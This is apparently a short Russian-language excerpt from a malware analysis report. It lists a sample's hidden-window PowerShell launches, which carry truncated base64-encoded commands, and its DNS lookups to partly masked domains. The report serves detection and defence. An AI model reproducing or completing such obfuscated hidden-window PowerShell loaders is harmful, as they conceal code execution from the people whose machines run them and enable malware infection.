Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAVQB5AHoAdABnAGEAaAB1AGUAZQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBaAHUAYQB0AGsAbQBmAHYAZQBlAHoAcwAgACMAPgAgACQAWABnAHkAaQBtAHoAcwB2AGEAdgA9ACcAUQ...
- DNS ASK to#####beljepara.com
- DNS ASK he###ewelry.com
- DNS ASK da####arment.com
- DNS ASK de#####talab.aosis.net
- DNS ASK le###757.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAVQB5AHoAdABnAGEAaAB1AGUAZQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBaAHUAYQB0AGsAbQBmAHYAZQBlAHoAcwAgACMAPgAgACQAWABnAHkAaQBtAHoAcwB2AGEAdgA9ACcAUQ...' (со скрытым окном)